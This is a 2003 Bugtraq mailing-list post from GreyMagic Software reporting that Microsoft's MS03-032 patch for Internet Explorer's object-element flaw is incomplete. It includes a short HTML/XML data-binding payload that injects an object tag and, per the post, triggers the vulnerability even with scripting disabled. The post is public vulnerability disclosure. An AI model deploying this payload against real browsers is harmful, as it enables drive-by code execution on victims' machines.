[31468] in bugtraq
RE: BAD NEWS: Microsoft Security Bulletin MS03-032
daemon@ATHENA.MIT.EDU (GreyMagic Software)
Mon Sep 8 15:12:46 2003
From: "GreyMagic Software" <security@greymagic.com>
To: "NTBugtraq" <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
"Bugtraq" <bugtraq@securityfocus.com>,
<full-disclosure@lists.netsys.com>, <vulnwatch@vulnwatch.org>
Cc: <http-equiv@excite.com>,
"Microsoft Security Response Center" <secure@microsoft.com>
Date: Mon, 8 Sep 2003 16:52:12 +0200
Message-ID: <LPBBLDGNEFOGMGAEHJPBKENNDGAA.security@greymagic.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="windows-1255"
Content-Transfer-Encoding: 7bit
In-Reply-To: <200309071316.h87DGI7i024059@web6.megawebservers.com>
>The patch for Drew's object data=funky.hta doesn't work:
This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
explains the problem in detail. Microsoft again patches the object element
in HTML, but it doesn't patch the dynamic version of that same element.
>1. Disable Active Scripting
This actually means that no scripting is needed at all in order to exploit
this amazingly critical vulnerability:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object data=x.asp></object>
]]>
</exploit>
</security>
</xml>
Ouch.